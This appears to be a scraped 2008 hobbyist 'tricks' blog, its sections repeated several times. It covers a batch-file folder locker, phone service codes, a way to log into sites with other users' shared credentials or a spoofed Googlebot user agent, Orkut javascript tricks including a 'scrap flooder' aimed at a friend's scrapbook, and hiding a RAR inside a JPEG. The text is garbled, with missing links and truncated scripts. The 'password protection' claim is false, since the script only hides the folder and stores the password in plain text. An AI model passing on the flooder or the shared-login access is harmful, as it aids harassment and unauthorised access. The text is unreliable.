You will learn here to make your own software to create FileProtector software. You will be able to do this just by the Notepad and the program provided here. Here is how to do that.
1) Copy the program below starting from #START# and copy upto #STOP#
2) Remove “pankaj” from the program and enter your password there.
3) Open Notepad and paste the program into it.
4) Save the notepad as FileProtector.bat
5) Double Click the FileProtector.bat file. You will see a new folder FileProtector created. There, you can store your files and folders to be password protected.
6) Double Click the file again, type y and press enter. The FileProtector folder will be hidden.
7) Double Click again and enter the password which you had set in STEP 2.
Thats all ! Your FileProtector software has been created. Now enjoy using free software created by you.
Q. What if somebody deletes my batch file ?
A. Don’t worry. You need to only create the batch file again with the same process as you did now and you will get all your files and folders back safely.
title Folder FileProtector
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST FileProtector goto MDFileProtector
echo Unprotected : Press y to lock the folder.
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren FileProtector "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder FileProtector
goto End
echo Please , give your password to open the protected files !
set/p "pass=>"
if NOT %pass%== pankaj goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" FileProtector
echo FileProtector Unlocked successfully
goto End
echo Invalid password
goto end
md FileProtector
echo FileProtector created successfully
goto End
You will learn here to make your own software to create FileProtector software. You will be able to do this just by the Notepad and the program provided here. Here is how to do that.
1) Copy the program below starting from #START# and copy upto #STOP#
2) Remove “pankaj” from the program and enter your password there.
3) Open Notepad and paste the program into it.
4) Save the notepad as FileProtector.bat
5) Double Click the FileProtector.bat file. You will see a new folder FileProtector created. There, you can store your files and folders to be password protected.
6) Double Click the file again, type y and press enter. The FileProtector folder will be hidden.
7) Double Click again and enter the password which you had set in STEP 2.
Thats all ! Your FileProtector software has been created. Now enjoy using free software created by you.
Q. What if somebody deletes my batch file ?
A. Don’t worry. You need to only create the batch file again with the same process as you did now and you will get all your files and folders back safely.
title Folder FileProtector
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST FileProtector goto MDFileProtector
echo Unprotected : Press y to lock the folder.
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren FileProtector "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder FileProtector
goto End
echo Please , give your password to open the protected files !
set/p "pass=>"
if NOT %pass%== pankaj goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" FileProtector
echo FileProtector Unlocked successfully
goto End
echo Invalid password
goto end
md FileProtector
echo FileProtector created successfully
goto End
How To Block SMS Reception
any GSM, ( if you are spammed by someone)
xxxx is your Call Barring code (default is 0000).
To remove this barring type: #35*xxxx#
How To Block SMS Reception
any GSM, ( if you are spammed by someone)
xxxx is your Call Barring code (default is 0000).
To remove this barring type: #35*xxxx#
Free Website Access Without Joining
Get free access to websites without registering..
This simple hack lets you access any website without registering to it.
It gives you a ID/Username and a password that was used by some other user to login into the site..
Go to
and type the URL of the website you want to log into.
-, - etcetera.
Another (and better) way is changing the user agent of your browser to:
This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
and add the Googlebot user agent.
This simple hack lets you access any website without registering to it.
It gives you a ID/Username and a password that was used by some other user to login into the site..
Go to
and type the URL of the website you want to log into.
-, - etcetera.
Another (and better) way is changing the user agent of your browser to:
This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
and add the Googlebot user agent.
Free Website Access Without Joining
Get free access to websites without registering..
This simple hack lets you access any website without registering to it.
It gives you a ID/Username and a password that was used by some other user to login into the site..
Go to
and type the URL of the website you want to log into.
-, - etcetera.
Another (and better) way is changing the user agent of your browser to:
This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
and add the Googlebot user agent.
This simple hack lets you access any website without registering to it.
It gives you a ID/Username and a password that was used by some other user to login into the site..
Go to
and type the URL of the website you want to log into.
-, - etcetera.
Another (and better) way is changing the user agent of your browser to:
This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
and add the Googlebot user agent.
Monday, November 10, 2008
Sony Ericson Useful Softwares
There are plenty of freewares availabe in the market for k750i annd i am going to list top 5 applications for sony ericsson k750i.
1. Cellity freeSMS - already known for its free mobile twitter client - offers a free SMS service*: cellity freeSMS, which is available now! Sending and receiving short messages results in no fees through cellity. Your provider will not charge for any costly SMS.
2. scanR Scan, Copy and Fax - Scan business cards, fax documents and capture whiteboard notes. Just take photos, send them to scanR, and get clean, legible copies as PDF`s or vCards.
3. mig33 - It is a combination mobile instant messenger and international calling card service.You can chat to your buddies and meet new friends using the group chat rooms, profiling, photo sharing, MSN, Yahoo & AOL Messenger.
4. eBuddy Mobile Messenger - It is a multi-net application that you can use intuitively for the main thing that you want such an application for: Chat with your buddies.
5. FileExplorer - A java based file explorer for sony ericsson phones.
Compatibility List: Sony-Ericsson: D750, D750i, F500i, J200i, J210i, J220i, J230i, J300a, J300i, K300, K300a, K300i, K310, K508c, K508i, K510a, K510i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, M600i, P800, P900, P910, P910a, P910i, P990i, S700, S700i, S710a, T226, T230, T290a, T290i, T610, T616, T630, T637, T68, V600, V600i, V630i, W300, W300i, W550c, W550i, W600c, W600i, W700i, W710i, W800i, W810i, W810iv, W850i, W850iv, W880i, W900i, W950i, Z1010, Z300i, Z500, Z500a, Z520a, Z520i, Z530i.
If you have any compatibility problems leave a comment here.
1. Cellity freeSMS - already known for its free mobile twitter client - offers a free SMS service*: cellity freeSMS, which is available now! Sending and receiving short messages results in no fees through cellity. Your provider will not charge for any costly SMS.
2. scanR Scan, Copy and Fax - Scan business cards, fax documents and capture whiteboard notes. Just take photos, send them to scanR, and get clean, legible copies as PDF`s or vCards.
3. mig33 - It is a combination mobile instant messenger and international calling card service.You can chat to your buddies and meet new friends using the group chat rooms, profiling, photo sharing, MSN, Yahoo & AOL Messenger.
4. eBuddy Mobile Messenger - It is a multi-net application that you can use intuitively for the main thing that you want such an application for: Chat with your buddies.
5. FileExplorer - A java based file explorer for sony ericsson phones.
Compatibility List: Sony-Ericsson: D750, D750i, F500i, J200i, J210i, J220i, J230i, J300a, J300i, K300, K300a, K300i, K310, K508c, K508i, K510a, K510i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, M600i, P800, P900, P910, P910a, P910i, P990i, S700, S700i, S710a, T226, T230, T290a, T290i, T610, T616, T630, T637, T68, V600, V600i, V630i, W300, W300i, W550c, W550i, W600c, W600i, W700i, W710i, W800i, W810i, W810iv, W850i, W850iv, W880i, W900i, W950i, Z1010, Z300i, Z500, Z500a, Z520a, Z520i, Z530i.
If you have any compatibility problems leave a comment here.
Sony Ericson Useful Softwares
There are plenty of freewares availabe in the market for k750i annd i am going to list top 5 applications for sony ericsson k750i.
1. Cellity freeSMS - already known for its free mobile twitter client - offers a free SMS service*: cellity freeSMS, which is available now! Sending and receiving short messages results in no fees through cellity. Your provider will not charge for any costly SMS.
2. scanR Scan, Copy and Fax - Scan business cards, fax documents and capture whiteboard notes. Just take photos, send them to scanR, and get clean, legible copies as PDF`s or vCards.
3. mig33 - It is a combination mobile instant messenger and international calling card service.You can chat to your buddies and meet new friends using the group chat rooms, profiling, photo sharing, MSN, Yahoo & AOL Messenger.
4. eBuddy Mobile Messenger - It is a multi-net application that you can use intuitively for the main thing that you want such an application for: Chat with your buddies.
5. FileExplorer - A java based file explorer for sony ericsson phones.
Compatibility List: Sony-Ericsson: D750, D750i, F500i, J200i, J210i, J220i, J230i, J300a, J300i, K300, K300a, K300i, K310, K508c, K508i, K510a, K510i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, M600i, P800, P900, P910, P910a, P910i, P990i, S700, S700i, S710a, T226, T230, T290a, T290i, T610, T616, T630, T637, T68, V600, V600i, V630i, W300, W300i, W550c, W550i, W600c, W600i, W700i, W710i, W800i, W810i, W810iv, W850i, W850iv, W880i, W900i, W950i, Z1010, Z300i, Z500, Z500a, Z520a, Z520i, Z530i.
If you have any compatibility problems leave a comment here.
1. Cellity freeSMS - already known for its free mobile twitter client - offers a free SMS service*: cellity freeSMS, which is available now! Sending and receiving short messages results in no fees through cellity. Your provider will not charge for any costly SMS.
2. scanR Scan, Copy and Fax - Scan business cards, fax documents and capture whiteboard notes. Just take photos, send them to scanR, and get clean, legible copies as PDF`s or vCards.
3. mig33 - It is a combination mobile instant messenger and international calling card service.You can chat to your buddies and meet new friends using the group chat rooms, profiling, photo sharing, MSN, Yahoo & AOL Messenger.
4. eBuddy Mobile Messenger - It is a multi-net application that you can use intuitively for the main thing that you want such an application for: Chat with your buddies.
5. FileExplorer - A java based file explorer for sony ericsson phones.
Compatibility List: Sony-Ericsson: D750, D750i, F500i, J200i, J210i, J220i, J230i, J300a, J300i, K300, K300a, K300i, K310, K508c, K508i, K510a, K510i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, M600i, P800, P900, P910, P910a, P910i, P990i, S700, S700i, S710a, T226, T230, T290a, T290i, T610, T616, T630, T637, T68, V600, V600i, V630i, W300, W300i, W550c, W550i, W600c, W600i, W700i, W710i, W800i, W810i, W810iv, W850i, W850iv, W880i, W900i, W950i, Z1010, Z300i, Z500, Z500a, Z520a, Z520i, Z530i.
If you have any compatibility problems leave a comment here.
Secret Codes For Motorola Phones
Motorola 7760, 7860, 2260, 8160, etc
Nam Programming:
Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down arrow 10 times to “PrefMod”
4) RIGHT Softkey (Change) until you see “DigOnly”
5) LEFT softkey (Exit)
6) MENU then LEFT Softkey return to idle screen
7) ##33284 (The last 4 will not display if you have done it correctly)
Motorola t182, c210, etc Nam Programming:
Nam Set: ##1111 end
Nam Set: ##298645665 end
Short Nam: ##073887 sto
Motorola v710, v730, v740, ms150, etc Nam Programming:
Nam Set: 8378*# + press 3 times NATE (spc - 071082)
Test Mode: Menu, 073887*, Spc
Service Menu: #758353266#646#
Motorola StarTac 2004 Nam Programming:
Nam Set: 5759789*#, rec key (3)times (spc - 915037)
Motorola ms200, ms230, etc Nam Programming:
Nam Set: 5759789*# (spc - 915037)
Motorola v6060 Nam Programming:
Nam Set:147*369#456*0#
v60, c120, c331, etc:
1) Turn on the phone. Press MENU 0 7 3 8 8 7 *
2) The phone will require you to “Enter a Security Code”, press 000000, OK
3) Scroll down to “Test mode” choose SELECT. Scroll down to “Enable”
choose SELECT. Your phone is now in test mode.
4) Signal strength is the 3_rd number down on the left hand side of the screen.
5) To toggle between regular mode and test mode: Press MODE then
6) To turn off the test mode the phone must be in regular mode, then follow
the above sequence and scroll down to where it says “DISABLE” instead of
“ENABLE” and choose select.
i will be posting more tricks and codes…
Nam Programming:
Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down arrow 10 times to “PrefMod”
4) RIGHT Softkey (Change) until you see “DigOnly”
5) LEFT softkey (Exit)
6) MENU then LEFT Softkey return to idle screen
7) ##33284 (The last 4 will not display if you have done it correctly)
Motorola t182, c210, etc Nam Programming:
Nam Set: ##1111 end
Nam Set: ##298645665 end
Short Nam: ##073887 sto
Motorola v710, v730, v740, ms150, etc Nam Programming:
Nam Set: 8378*# + press 3 times NATE (spc - 071082)
Test Mode: Menu, 073887*, Spc
Service Menu: #758353266#646#
Motorola StarTac 2004 Nam Programming:
Nam Set: 5759789*#, rec key (3)times (spc - 915037)
Motorola ms200, ms230, etc Nam Programming:
Nam Set: 5759789*# (spc - 915037)
Motorola v6060 Nam Programming:
Nam Set:147*369#456*0#
v60, c120, c331, etc:
1) Turn on the phone. Press MENU 0 7 3 8 8 7 *
2) The phone will require you to “Enter a Security Code”, press 000000, OK
3) Scroll down to “Test mode” choose SELECT. Scroll down to “Enable”
choose SELECT. Your phone is now in test mode.
4) Signal strength is the 3_rd number down on the left hand side of the screen.
5) To toggle between regular mode and test mode: Press MODE then
6) To turn off the test mode the phone must be in regular mode, then follow
the above sequence and scroll down to where it says “DISABLE” instead of
“ENABLE” and choose select.
i will be posting more tricks and codes…
Secret Codes For Motorola Phones
Motorola 7760, 7860, 2260, 8160, etc
Nam Programming:
Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down arrow 10 times to “PrefMod”
4) RIGHT Softkey (Change) until you see “DigOnly”
5) LEFT softkey (Exit)
6) MENU then LEFT Softkey return to idle screen
7) ##33284 (The last 4 will not display if you have done it correctly)
Motorola t182, c210, etc Nam Programming:
Nam Set: ##1111 end
Nam Set: ##298645665 end
Short Nam: ##073887 sto
Motorola v710, v730, v740, ms150, etc Nam Programming:
Nam Set: 8378*# + press 3 times NATE (spc - 071082)
Test Mode: Menu, 073887*, Spc
Service Menu: #758353266#646#
Motorola StarTac 2004 Nam Programming:
Nam Set: 5759789*#, rec key (3)times (spc - 915037)
Motorola ms200, ms230, etc Nam Programming:
Nam Set: 5759789*# (spc - 915037)
Motorola v6060 Nam Programming:
Nam Set:147*369#456*0#
v60, c120, c331, etc:
1) Turn on the phone. Press MENU 0 7 3 8 8 7 *
2) The phone will require you to “Enter a Security Code”, press 000000, OK
3) Scroll down to “Test mode” choose SELECT. Scroll down to “Enable”
choose SELECT. Your phone is now in test mode.
4) Signal strength is the 3_rd number down on the left hand side of the screen.
5) To toggle between regular mode and test mode: Press MODE then
6) To turn off the test mode the phone must be in regular mode, then follow
the above sequence and scroll down to where it says “DISABLE” instead of
“ENABLE” and choose select.
i will be posting more tricks and codes…
Nam Programming:
Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down arrow 10 times to “PrefMod”
4) RIGHT Softkey (Change) until you see “DigOnly”
5) LEFT softkey (Exit)
6) MENU then LEFT Softkey return to idle screen
7) ##33284 (The last 4 will not display if you have done it correctly)
Motorola t182, c210, etc Nam Programming:
Nam Set: ##1111 end
Nam Set: ##298645665 end
Short Nam: ##073887 sto
Motorola v710, v730, v740, ms150, etc Nam Programming:
Nam Set: 8378*# + press 3 times NATE (spc - 071082)
Test Mode: Menu, 073887*, Spc
Service Menu: #758353266#646#
Motorola StarTac 2004 Nam Programming:
Nam Set: 5759789*#, rec key (3)times (spc - 915037)
Motorola ms200, ms230, etc Nam Programming:
Nam Set: 5759789*# (spc - 915037)
Motorola v6060 Nam Programming:
Nam Set:147*369#456*0#
v60, c120, c331, etc:
1) Turn on the phone. Press MENU 0 7 3 8 8 7 *
2) The phone will require you to “Enter a Security Code”, press 000000, OK
3) Scroll down to “Test mode” choose SELECT. Scroll down to “Enable”
choose SELECT. Your phone is now in test mode.
4) Signal strength is the 3_rd number down on the left hand side of the screen.
5) To toggle between regular mode and test mode: Press MODE then
6) To turn off the test mode the phone must be in regular mode, then follow
the above sequence and scroll down to where it says “DISABLE” instead of
“ENABLE” and choose select.
i will be posting more tricks and codes…
Sunday, November 9, 2008
Long Name In Ur Orkut Profile
Long name in Profile
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[10].maxlength=200;}void(setInterval(de,300));javascript:var i=0;function de(){i=i+1;document.forms[0].elements[11].maxlength=200;}void(setInterval(de,300));
1.Create a new profile.
2.while you sign up on google account page, do not enter your first and second name.
3.Run the following two scripts one after the other.
4.Write something in First and second name not exceeding 200 characters.
5.Save the changes.
Close the window or press REFRESH to stop flooding.
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[10].maxlength=200;}void(setInterval(de,300));javascript:var i=0;function de(){i=i+1;document.forms[0].elements[11].maxlength=200;}void(setInterval(de,300));
1.Create a new profile.
2.while you sign up on google account page, do not enter your first and second name.
3.Run the following two scripts one after the other.
4.Write something in First and second name not exceeding 200 characters.
5.Save the changes.
Close the window or press REFRESH to stop flooding.
Long Name In Ur Orkut Profile
Long name in Profile
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[10].maxlength=200;}void(setInterval(de,300));javascript:var i=0;function de(){i=i+1;document.forms[0].elements[11].maxlength=200;}void(setInterval(de,300));
1.Create a new profile.
2.while you sign up on google account page, do not enter your first and second name.
3.Run the following two scripts one after the other.
4.Write something in First and second name not exceeding 200 characters.
5.Save the changes.
Close the window or press REFRESH to stop flooding.
javascript:var i=0;function de(){i=i+1;document.forms[0].elements[10].maxlength=200;}void(setInterval(de,300));javascript:var i=0;function de(){i=i+1;document.forms[0].elements[11].maxlength=200;}void(setInterval(de,300));
1.Create a new profile.
2.while you sign up on google account page, do not enter your first and second name.
3.Run the following two scripts one after the other.
4.Write something in First and second name not exceeding 200 characters.
5.Save the changes.
Close the window or press REFRESH to stop flooding.
Scrap Flooder
Scrapbook flooder
item(0).value;document.body.innerHTML+='<iframe #
1.Requirement: The person whose scrapbook you want to flood must be in YOUR FRIENDLIST.
2.Open the scrapbook of the target person.
3.Copy ANY ONE of the following javascripts into the URL Bar.
4.Hit ENTER.
Scrap Flooder
Scrapbook flooder
item(0).value;document.body.innerHTML+='<iframe #
1.Requirement: The person whose scrapbook you want to flood must be in YOUR FRIENDLIST.
2.Open the scrapbook of the target person.
3.Copy ANY ONE of the following javascripts into the URL Bar.
4.Hit ENTER.
Hide Ur Files In A JPEG File
For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:/hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:/hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:/hidden.
4. Now, open Command Prompt (Go to Run and type cmd). Change the directory to c:/hidden by typing "cd c:/hidden" w/o qoutes.
5. Now type: “COPY /b logo.jpg+secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:/hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:/hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:/hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:/hidden.
4. Now, open Command Prompt (Go to Run and type cmd). Change the directory to c:/hidden by typing "cd c:/hidden" w/o qoutes.
5. Now type: “COPY /b logo.jpg+secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:/hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
Hide Ur Files In A JPEG File
For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:/hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:/hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:/hidden.
4. Now, open Command Prompt (Go to Run and type cmd). Change the directory to c:/hidden by typing "cd c:/hidden" w/o qoutes.
5. Now type: “COPY /b logo.jpg+secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:/hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:/hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:/hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:/hidden.
4. Now, open Command Prompt (Go to Run and type cmd). Change the directory to c:/hidden by typing "cd c:/hidden" w/o qoutes.
5. Now type: “COPY /b logo.jpg+secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:/hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
Secret Codes For Noki Phones [Works In Most Ones]
(1) *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx.
(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370# ( Favourite )
(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
(4) *#4720# Deactivate Half Rate Codec.
5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line :
Compression Type. ( Favourite )
(6) *#9999# Phones software version if *#0000# does not work.
(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number). ( Favourite )
(8) #pw+1234567890+ 1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(9) #pw+1234567890+ 2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(10) #pw+1234567890+ 3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(11) #pw+1234567890+ 4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(12) *#147# (vodafone) this lets you know who called you last.
(13) *#1471# Last call (Only vodofone).
(14) *#21# Allows you to check the number that "All Calls" are diverted to
(15) *#2640# Displays security code in use.
(16) *#30# Lets you see the private number.
(17) *#43# Allows you to check the "Call Waiting" status of your phone.
(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.
(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.
(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.
(21) *#67705646# Removes operator logo on 3310 & 3330.
(22) *#73# Reset phone timers and game scores.
(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature
(24) *#7760# Manufactures code.
(25) *#7780# Restore factory settings
26) *#8110# Software version for the nokia 8110.
(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair
(0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. (Favourite )
(28) *#94870345123456789 # Deactivate the PWM-Mem.
(29) **21*number# Turn on "All Calls" diverting to the phone number entered.
(30) **61*number# Turn on "No Reply" diverting to the phone number entered.
(31) **67*number# Turn on "On Busy" diverting to the phone number entered.
(32) 12345 This is the default security code.
Press and hold # Lets you switch between lines
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
Provider lock status: #pw+1234567890+ 1
Network lock status #pw+1234567890+ 2
Provider lock status: #pw+1234567890+ 3
SimCard lock status: #pw+1234567890+ 4
NOKIA 6110/6120/6130/ 6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
NOKIA 3110
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
NOKIA 3330
*#06# This will show your warranty details *#92702689#
*3370# Basically increases the quality of calling sound, but decreases battery length.
#3370# Deactivates the above
*#0000# Shows your software version
*#746025625# This shows if your phone will allow sim clock stoppage
*4370# Half Rate Codec activation. It will automatically restart
#4370# Half Rate Codec deactivation. It will automatically restart
Restore Factory Settings To do this simply use this code
*#7780# Manufacturer Info Date of Manufacturing *#3283#
(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370# ( Favourite )
(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
(4) *#4720# Deactivate Half Rate Codec.
5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line :
Compression Type. ( Favourite )
(6) *#9999# Phones software version if *#0000# does not work.
(7) *#06# For checking the International Mobile Equipment Identity (IMEI Number). ( Favourite )
(8) #pw+1234567890+ 1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(9) #pw+1234567890+ 2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(10) #pw+1234567890+ 3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(11) #pw+1234567890+ 4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
(12) *#147# (vodafone) this lets you know who called you last.
(13) *#1471# Last call (Only vodofone).
(14) *#21# Allows you to check the number that "All Calls" are diverted to
(15) *#2640# Displays security code in use.
(16) *#30# Lets you see the private number.
(17) *#43# Allows you to check the "Call Waiting" status of your phone.
(18) *#61# Allows you to check the number that "On No Reply" calls are diverted to.
(19) *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.
(20) *#67# Allows you to check the number that "On Busy Calls" are diverted to.
(21) *#67705646# Removes operator logo on 3310 & 3330.
(22) *#73# Reset phone timers and game scores.
(23) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature
(24) *#7760# Manufactures code.
(25) *#7780# Restore factory settings
26) *#8110# Software version for the nokia 8110.
(27) *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair
(0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again. (Favourite )
(28) *#94870345123456789 # Deactivate the PWM-Mem.
(29) **21*number# Turn on "All Calls" diverting to the phone number entered.
(30) **61*number# Turn on "No Reply" diverting to the phone number entered.
(31) **67*number# Turn on "On Busy" diverting to the phone number entered.
(32) 12345 This is the default security code.
Press and hold # Lets you switch between lines
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
Provider lock status: #pw+1234567890+ 1
Network lock status #pw+1234567890+ 2
Provider lock status: #pw+1234567890+ 3
SimCard lock status: #pw+1234567890+ 4
NOKIA 6110/6120/6130/ 6150/6190
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
Enhanced Full Rate: * 3 3 7 0 # [ # 3 3 7 0 # off]
Half Rate: * 4 7 2 0 #
NOKIA 3110
IMEI number: * # 0 6 #
Software version: * # 0 0 0 0 # or * # 9 9 9 9 # or * # 3 1 1 0 #
Simlock info: * # 9 2 7 0 2 6 8 9 #
NOKIA 3330
*#06# This will show your warranty details *#92702689#
*3370# Basically increases the quality of calling sound, but decreases battery length.
#3370# Deactivates the above
*#0000# Shows your software version
*#746025625# This shows if your phone will allow sim clock stoppage
*4370# Half Rate Codec activation. It will automatically restart
#4370# Half Rate Codec deactivation. It will automatically restart
Restore Factory Settings To do this simply use this code
*#7780# Manufacturer Info Date of Manufacturing *#3283#
Secret Codes For Noki Phones [Works In Most Ones]
(1) *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx.
(2) #3370# Deactivate Enhanced Full Rate Codec (EFR) OR *3370# ( Favourite )
(3) *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
(4) *#4720# Deactivate Half Rate Codec.
5) *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line :
Compression Type. ( Favourite )
(6) *#9999# Phones software version if *#0000# does not work.
